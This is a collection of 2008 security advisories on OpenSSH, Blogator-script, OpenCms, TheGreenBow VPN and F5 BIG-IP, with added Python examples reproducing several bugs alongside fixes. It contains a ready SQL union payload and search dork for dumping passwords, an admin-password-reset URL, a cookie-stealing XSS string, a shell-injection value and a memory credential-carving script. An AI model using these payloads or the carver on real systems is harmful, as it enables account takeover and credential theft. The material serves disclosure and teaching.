[ GLSA 200804-03 ] OpenSSH: Privilege escalation
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                   Gentoo Linux Security Advisory           GLSA 200804-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: OpenSSH: Privilege escalation
      Date: April 05, 2008
      Bugs: #214985, #215702
        ID: 200804-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Two flaws have been discovered in OpenSSH which could allow local
attackers to escalate their privileges.

Background
==========

OpenSSH is a complete SSH protocol implementation that includes an SFTP
client and server support.

Affected packages
=================

    -------------------------------------------------------------------
     Package             /  Vulnerable  /                    Unaffected
    -------------------------------------------------------------------
  1  net-misc/openssh       < 4.7_p1-r6                    >= 4.7_p1-r6

Description
===========

Two issues have been discovered in OpenSSH:

* Timo Juhani Lindfors discovered that OpenSSH sets the DISPLAY variable
  in SSH sessions using X11 forwarding even when it cannot bind the X11
  server to a local port in all address families (CVE-2008-1483).

* OpenSSH will execute the contents of the ".ssh/rc" file even when the
  "ForceCommand" directive is enabled in the global sshd_config
  (CVE-2008-1657).

Impact
======

A local attacker could exploit the first vulnerability to hijack
forwarded X11 sessions of other users and possibly execute code with
their privileges, disclose sensitive data or cause a Denial of Service,
by binding a local X11 server to a port using only one address family.
The second vulnerability might allow local attackers to bypass intended
security restrictions and execute commands other than those specified
by "ForceCommand" if they are able to write to their home directory.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All OpenSSH users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-misc/openssh-4.7_p1-r6"

References
==========

  [ 1 ] CVE-2008-1483
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1483
  [ 2 ] CVE-2008-1657
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1657

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200804-03.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
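The first issue (CVE-2008-1483) reduced to the one decision that matters: which display number sshd accepts for a forwarded X11 listener. This is an added example, not OpenSSH code. It assumes the listener is a TCP socket on base_port + display (X11 uses 6000 + display) bound to loopback in every address family the host supports, as sshd does with X11UseLocalhost yes; the "attacker" is a constructed socket that holds only the IPv4 side of a port. The pre-fix rule accepts a display as soon as one family binds; the corrected rule rejects a display if anyone already holds the port in any supported family.

```python
"""CVE-2008-1483 in miniature: choosing a port for a forwarded X11 display.

Added example, not OpenSSH's code.  Assumption: the listener is a TCP
socket on base_port + display (X11 uses 6000 + display) bound to loopback
in every address family the host supports, as sshd does with
X11UseLocalhost yes.  The "attacker" in the demo is a constructed socket
that holds only the IPv4 side of a port.
"""
import errno
import socket

LOOPBACK = {socket.AF_INET: "127.0.0.1", socket.AF_INET6: "::1"}
# errors that mean "this host has no such family", not "someone holds the port"
UNSUPPORTED = {errno.EAFNOSUPPORT, errno.EPROTONOSUPPORT, errno.EADDRNOTAVAIL}


def try_bind(port):
    """Bind port in every family.  Returns (bound_sockets, squatted_families).

    squatted_families are families where bind failed although the host
    supports them: another local process already owns that side of the port.
    """
    bound, squatted = [], set()
    for fam, addr in LOOPBACK.items():
        try:
            s = socket.socket(fam, socket.SOCK_STREAM)
        except OSError as e:
            if e.errno in UNSUPPORTED:
                continue
            raise
        try:
            s.bind((addr, port))
        except OSError as e:
            s.close()
            if e.errno not in UNSUPPORTED:
                squatted.add(fam)
            continue
        bound.append(s)
    return bound, squatted


def close_all(socks):
    for s in socks:
        s.close()


def pick_display(base_port, first, count, require_all_families):
    """Try displays first .. first+count-1; return (display, sockets) or (None, []).

    require_all_families=False is the behaviour the advisory describes: one
    successful family is enough, DISPLAY gets exported, and whoever holds the
    other family's port receives the client's X11 connections.
    require_all_families=True is the corrected rule: a port held by anyone in
    any supported family disqualifies the display and the next one is tried.
    """
    for display in range(first, first + count):
        bound, squatted = try_bind(base_port + display)
        if bound and not (require_all_families and squatted):
            return display, bound
        close_all(bound)
    return None, []


def squat_ipv4_port():
    """Constructed attacker: take the IPv4 side of some free port only."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    return s, s.getsockname()[1]


def ipv6_loopback_available():
    """True if this host can bind ::1, i.e. the hijack scenario is possible."""
    try:
        s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
        s.bind(("::1", 0))
        s.close()
        return True
    except OSError:
        return False


if __name__ == "__main__":
    squat, port = squat_ipv4_port()
    for rule in (False, True):
        display, socks = pick_display(port, 0, 5, rule)
        print("require_all_families=%-5s -> display %s" % (rule, display))
        close_all(socks)
    squat.close()
```

On a dual-stack host the pre-fix rule hands out display 0 while the squatter owns its IPv4 port, which is exactly the condition under which a client connecting to DISPLAY=localhost:0 over IPv4 talks to the attacker; the corrected rule skips to display 1. Without IPv6 loopback both rules skip display 0, because then the only family is squatted and nothing binds at all.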
Blogator-script 0.95 SQL Injection Vulnerability
#
#...:Blogator-script 0.95 SQL Injection Vulnerability
#
# Virangar Security Team
# www.virangar.org
# www.virangar.net
#
# Discovered By: virangar security team (hadihadi)
#
# special tnx to: MR.nosrati, black.shadowes, MR.hesy, Zahra & all virangar members & all hackerz
#
# greetz: to my best friend in the world hadi_aryaie2004 & my lovely friend arash (imm02tal) from emperor team :)
#
---
dork: inurl:/_blogadata/
---

vuln code in /_blogadata/include/sond_result.php:

line 27: $id_art=$_GET['id_art'];
..
line 34: $sql_res=mysql_query("SELECT sond_rep, votes_H, votes_F FROM sondage_rep WHERE id_sond = $id_art ORDER BY ordre");

vuln:
http://www.site.com/_blogadata/include/sond_result.php?id_art=-9/**/union/**/select/**/concat(pseudo,0x3a,pass,char(58),email),2,3/**/from/**/membre/**/where/**/id_membre=1/*

you can see in Blogator-script other injection bugs too ;)
Alkacon OpenCms sessions.jsp searchfilter XSS
Product: Alkacon OpenCms
http://www.opencms.org/

OpenCms contains a cross-site scripting vulnerability in the active session
reporting function. Input to parameter searchfilter in page
opencms/system/workplace/admin/workplace/sessions.jsp is not sufficiently
validated and/or sanitized before it gets embedded in the resulting web page.

Example:

http://(target)/opencms/system/workplace/admin/workplace/sessions.jsp?
ispopup=&action=listsearch&framename=&title=
&closelink=%252Fopencms%252Fopencms%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fworkplace
&preactiondone=&dialogtype=&message=&resource=&listaction=&base=&selitems=
&formname=ls-form&sortcol=&originalparams=&page=&style=new&root=
&path=%252Fworkplace%252Fbroadcast&redirect=
&searchfilter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
&listSearchFilter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

The vulnerability has been identified in version 7.0.3. However, other
versions may be also affected.

Despite similarities this is a different vulnerability than CVE-2008-1510.

Solution:
Users should not browse untrusted sites while logged into OpenCms.

Found by: nnposter
Blogator-script 0.95 Change User Password Vulnerability
##
#
# ...:Blogator-script 0.95 Change User Password Vulnerability
#
##
# Virangar Security Team
# www.virangar.org
# www.virangar.net
#
# Discovered By: virangar security team (hadihadi)
#
# special tnx to: MR.nosrati, black.shadowes, MR.hesy, Zahra & all virangar members & all hackerz
#
# greetz: to my best friend in the world hadi_aryaie2004 & my lovely friend arash (imm02tal) from emperor team :)
#
---
dork: inurl:/_blogadata/
---

vuln code in /_blogadata/include/init_pass2.php:

line 23: $id=$_GET['a'];
line 24: $email=$_GET['b'];
line 25: $mdp=$_GET['c'];
.
line 27: $sql_change_pass=mysql_query("UPDATE membre SET pass = '$mdp' WHERE id_membre = '$id' AND email LIKE '$email' LIMIT 1");

so if we put the user id for $id, put % (any) for the user email ($email) and $mdp=newpassword... he he he :)

vuln:
http://www.site.com/_blogadata/include/init_pass2.php?c=[newpass]&a=[user id]&b=%

example (change admin pass to 123456):
http://www.site.com/_blogadata/include/init_pass2.php?c=123456&a=1&b=%
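Both Blogator-script findings above, the sond_result.php union injection and the init_pass2.php password reset, in one added example that is not Blogator's own PHP: each vulnerable query rebuilt in Python against an in-memory database, next to a corrected version. Table and column names (membre, sondage_rep, id_membre, pseudo, pass, email) come from the two advisories; the rows are constructed. SQLite stands in for MySQL, so the union payload uses || instead of concat() and the UPDATE drops MySQL's LIMIT 1, which stock SQLite builds reject.

```python
"""Both Blogator-script 0.95 findings reproduced against in-memory SQLite,
vulnerable query next to the corrected one.

Added example, not Blogator's PHP.  Table and column names come from the
advisories; the rows are constructed.  SQLite stands in for MySQL, so the
payload uses || instead of concat() and the UPDATE drops LIMIT 1.
"""
import sqlite3

# the advisory's union payload adapted to SQLite; the trailing /* swallows
# the " ORDER BY ordre" that the original query appends
UNION_PAYLOAD = ("-9 UNION SELECT pseudo||':'||pass||':'||email,2,3 "
                 "FROM membre WHERE id_membre=1/*")


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE membre (id_membre INTEGER PRIMARY KEY, pseudo TEXT,
                             pass TEXT, email TEXT);
        CREATE TABLE sondage_rep (id_sond INTEGER, sond_rep TEXT,
                                  votes_H INTEGER, votes_F INTEGER,
                                  ordre INTEGER);
        INSERT INTO membre VALUES (1, 'admin', 'hash-of-admin-password',
                                   'admin@example.com');
        INSERT INTO sondage_rep VALUES (1, 'yes', 3, 2, 1), (1, 'no', 1, 4, 2);
    """)
    return db


def poll_results_vulnerable(db, id_art):
    # sond_result.php line 34: $id_art dropped into the SQL unquoted, unchecked
    sql = ("SELECT sond_rep, votes_H, votes_F FROM sondage_rep "
           "WHERE id_sond = %s ORDER BY ordre" % id_art)
    return db.execute(sql).fetchall()


def poll_results_fixed(db, id_art):
    # reject anything that is not an integer, then bind it as a parameter
    try:
        id_int = int(id_art)
    except (TypeError, ValueError):
        return None
    return db.execute("SELECT sond_rep, votes_H, votes_F FROM sondage_rep "
                      "WHERE id_sond = ? ORDER BY ordre", (id_int,)).fetchall()


def reset_password_vulnerable(db, a, b, c):
    # init_pass2.php line 27: a=id, b=email, c=new password, all from $_GET.
    # Two bugs: string interpolation, and LIKE, so b=% matches every email.
    sql = ("UPDATE membre SET pass = '%s' WHERE id_membre = '%s' "
           "AND email LIKE '%s'" % (c, a, b))
    return db.execute(sql).rowcount


def reset_password_fixed(db, a, b, c):
    # exact comparison and bound parameters.  A real reset flow would also
    # demand a secret token mailed to the address rather than trust the caller.
    try:
        id_int = int(a)
    except (TypeError, ValueError):
        return 0
    return db.execute("UPDATE membre SET pass = ? WHERE id_membre = ? "
                      "AND email = ?", (c, id_int, b)).rowcount


if __name__ == "__main__":
    db = make_db()
    print("union payload, vulnerable :", poll_results_vulnerable(db, UNION_PAYLOAD))
    print("union payload, fixed      :", poll_results_fixed(db, UNION_PAYLOAD))
    print("reset with b=%, vulnerable:",
          reset_password_vulnerable(db, "1", "%", "123456"), "row(s) changed")
    print("reset with b=%, fixed     :",
          reset_password_fixed(db, "1", "%", "123456"), "row(s) changed")
```

The password reset shows why parameter binding alone is not the whole fix: with `email LIKE ?` bound safely, b=% would still match the admin row, so the comparison has to become an exact match (and the flow should stop trusting a caller-supplied address at all).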
TheGreenBowVPN, Login Credentials Disclosure
Hi there,

###

TheGreenBow IPSec VPN Client Login Credentials Information Disclosure
Vulnerability

Information

Risk: Low
Typology: Local
Date: 30/03/2008
Product: TheGreenBow IPSec VPN Client
Version: 4.10.010
Vendor: http://www.thegreenbow.com/vpn.html

Vendor Status:
29/03/2008 - Vendor Informed
30/03/2008 - Reply from the Vendor
31/03/2008 - Patch Released

Discovered By: Giuseppe `Evilcry` Bonfa'

Description

TheGreenBow IPSec VPN Client is an on demand IPSec VPN Client, compliant
with most popular VPN gateways and with network tools to deploy security in
large and medium enterprises. Highly efficient and easy to configure, the
IPSec VPN Client also allows peer-to-peer VPN.

PoC

TheGreenBow IPSec VPN Client 4.10.010 is prone to a login credentials
disclosure that could expose local users of TheGreenBow to a leak of
sensitive information; specifically, an attacker could carve the login
credentials and certificates used by the user, because they are stored in
the clear in memory. This may lead to complete user impersonation.

Attackers can exploit this issue to harvest VPN login credentials and gain
unauthorized access to networks and resources protected by the VPN.

All information is stored in the memory image of the process 'Tgbike.exe',
so it can be retrieved with a basic process memory dumper. We can identify
some keywords to use for credentials carving:

Xuser =
Xpassword =

# CERTIFICATES
-Client-Private-Key]
#

A PDF version of the Advisory is available here:
http://evilcry.altervista.org/tuts/theGreenBow.pdf

Regards,
Giuseppe 'Evilcry' Bonfa'
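The carving step the advisory describes, as an added example that is not the advisory author's tool (his PDF is linked above). The three keywords are the ones the advisory lists; everything else is an assumption made here: a value ends at CR, LF or NUL; a "-Client-Private-Key]" section header is followed by the key material as consecutive non-empty lines; strings may sit in memory either as 8-bit text or as UTF-16LE, as Windows programs commonly store them. The memory image is constructed, not a real dump.

```python
"""Credential carving over a process memory image, the step the advisory
describes for TheGreenBow's Tgbike.exe.

Added example, not the advisory author's tool.  The three keywords are the
advisory's; the value layout (CR/LF/NUL terminated, key material as the
lines after its section header, 8-bit or UTF-16LE strings) and the sample
image are assumptions made here.
"""
import re

KEYWORDS = (
    (b"Xuser =", "line"),                  # value on the same line
    (b"Xpassword =", "line"),
    (b"-Client-Private-Key]", "section"),  # value is the block of lines after it
)


def _pattern(kw, kind, wide):
    """Build the regex for one keyword, in 8-bit or UTF-16LE form."""
    if wide:
        kw_b = kw.decode("ascii").encode("utf-16-le")
        ch, nl, sp = rb"[^\r\n\x00]\x00", rb"(?:\r\x00)?\n\x00", rb"[ \t]\x00"
    else:
        kw_b = kw
        ch, nl, sp = rb"[^\r\n\x00]", rb"\r?\n", rb"[ \t]"
    if kind == "line":
        tail = rb"(?:" + sp + rb")*((?:" + ch + rb"){1,256})"
    else:
        tail = nl + rb"((?:(?:" + ch + rb")+" + nl + rb")+)"
    return re.compile(re.escape(kw_b) + tail)


def carve(dump):
    """Return every keyword hit as {keyword, wide, offset, value}, by offset."""
    hits = []
    for kw, kind in KEYWORDS:
        for wide in (False, True):
            enc = "utf-16-le" if wide else "latin-1"
            for m in _pattern(kw, kind, wide).finditer(dump):
                text = m.group(1).decode(enc)
                if kind == "section":
                    text = "\n".join(text.splitlines())
                hits.append({"keyword": kw.decode("ascii"), "wide": wide,
                             "offset": m.start(), "value": text})
    return sorted(hits, key=lambda h: h["offset"])


# constructed image: INI-style config text, padding and junk, a UTF-16LE copy
# of one line, and a PEM-looking key section (placeholder, not a real key)
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"[Gateway1]\r\nXuser = alice\r\nXpassword = Tr0ub4dor&3\r\n"
    + b"\x8a\x14garbage\x00\x00\x00\x00"
    + "Xuser = bob\r\n".encode("utf-16-le")
    + b"\xff\xfe\x00"
    + b"[Gateway1-Client-Private-Key]\r\n"
    + b"-----BEGIN RSA PRIVATE KEY-----\r\n"
    + b"CONSTRUCTED-SAMPLE-NOT-A-REAL-KEY\r\n"
    + b"-----END RSA PRIVATE KEY-----\r\n\r\n[Next]\r\n"
)

if __name__ == "__main__":
    for h in carve(SAMPLE_DUMP):
        form = "utf-16" if h["wide"] else "8-bit"
        print("%08x %-6s %-22s %r" % (h["offset"], form, h["keyword"], h["value"]))
```

Feed it the raw bytes of a full-process dump (for example the output of a user-mode dumper read with `open(path, "rb").read()`); scanning both encodings matters because a Windows GUI process frequently keeps the same secret in a narrow copy from the configuration file and a wide copy in the edit control that displayed it.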
F5 BIG-IP Management Interface Perl Injection
Product: F5 BIG-IP
http://www.f5.com/products/big-ip/

The F5 BIG-IP reconfiguration facility, used by both the web management
interface and the CLI, suffers from insufficient input validation and/or
sanitization of certain reconfiguration requests. It is possible for a
logged-in user with Resource Manager or Administrator privileges to inject
arbitrary Perl code, including spawning Unix shell commands, that gets
immediately executed with root privileges. (For the Administrator role this
does not provide any new privileges because it is already provided with
full shell access as root.)

The core of the problem is using Perl EP3 with templates containing
substitutions similar to

    $val='NEW_VALUE';

without first escaping single quotes in NEW_VALUE.

As an example, the SNMP community string configuration accepts the
following value as an allowed source of SNMP requests:

    none'.`touch /etc/foo`.'

It is possible to craft URL links that would inject the code with a simple
HTTP GET request. Cross-site attacks may leverage this vulnerability to make
an arbitrary change to the BIG-IP appliance.

The vulnerability has been identified in version 9.4.3. However, other
versions may be also affected.

Found by: nnposter